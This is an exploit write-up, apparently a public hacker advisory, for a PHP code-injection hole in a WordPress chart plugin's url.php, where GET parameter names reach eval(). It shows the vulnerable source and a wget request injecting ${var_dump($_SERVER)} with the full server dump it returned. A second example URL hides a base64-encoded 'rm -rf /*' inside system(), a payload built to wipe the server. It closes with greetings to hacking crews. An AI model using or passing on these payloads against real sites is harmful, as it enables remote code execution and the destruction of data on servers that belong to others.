root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
<?php
require("../lib/phpchart.class.php");
$color_var=array("txt_col","line_col","bg_color");
$cname=$_GET["type"];
$chart=new PHPChart($cname);
foreach($_GET as $key=>$value)
{
if($value!="")
{
if(in_array($key,$color_var))
eval('$chart->'.$key.'="#'.$value.'";');
else if($value=='yes')
eval('$chart->'.$key.'=true;');
else if($value=='no')
eval('$chart->'.$key.'=false;');
else if(is_numeric($value))
eval('$chart->'.$key.'='.$value.';');
else
eval('$chart->'.$key."='".$value."';");
}
}
$chart->genChart();
Exploitation:
root@debian:/tmp# wget 'http://hacker1.own//wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16-- http://hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
[ <=> ] 1,917 --.-K/s in 0s
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
["DOCUMENT_ROOT"]=>
string(28) "/etc/apache2/htdocs/hacker1/"
["GATEWAY_INTERFACE"]=>
string(7) "CGI/1.1"
["HTTP_ACCEPT"]=>
string(3) "*/*"
["HTTP_CLIENT_IP"]=>
string(9) "127.0.0.1"
["HTTP_HOST"]=>
string(11) "hacker1.own"
["HTTP_USER_AGENT"]=>
string(21) "Wget/1.12 (linux-gnu)"
["HTTP_VIA"]=>
string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
["HTTP_X_FORWARDED_FOR"]=>
string(9) "127.0.0.1"
["PATH"]=>
string(4) "/bin"
["PHPRC"]=>
string(14) "/etc/php5/cgi/"
["QUERY_STRING"]=>
string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["REDIRECT_STATUS"]=>
string(3) "200"
["REMOTE_ADDR"]=>
string(9) "127.0.0.1"
["REMOTE_PORT"]=>
string(5) "60830"
["REQUEST_METHOD"]=>
string(3) "GET"
["REQUEST_URI"]=>
string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["SCRIPT_FILENAME"]=>
string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
["SCRIPT_NAME"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["SERVER_ADDR"]=>
string(9) "127.0.0.1"
["SERVER_ADMIN"]=>
string(21) "webmaster@hacker1.own"
["SERVER_NAME"]=>
string(11) "hacker1.own"
["SERVER_PORT"]=>
string(2) "80"
["SERVER_PROTOCOL"]=>
string(8) "HTTP/1.1"
["SERVER_SIGNATURE"]=>
string(0) ""
["SERVER_SOFTWARE"]=>
string(6) "Apache"
["UNIQUE_ID"]=>
string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
["PHP_SELF"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["REQUEST_TIME"]=>
int(1358302756)
}
Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
Example 2:
http://hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL
=====================ENDS HERE============================
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep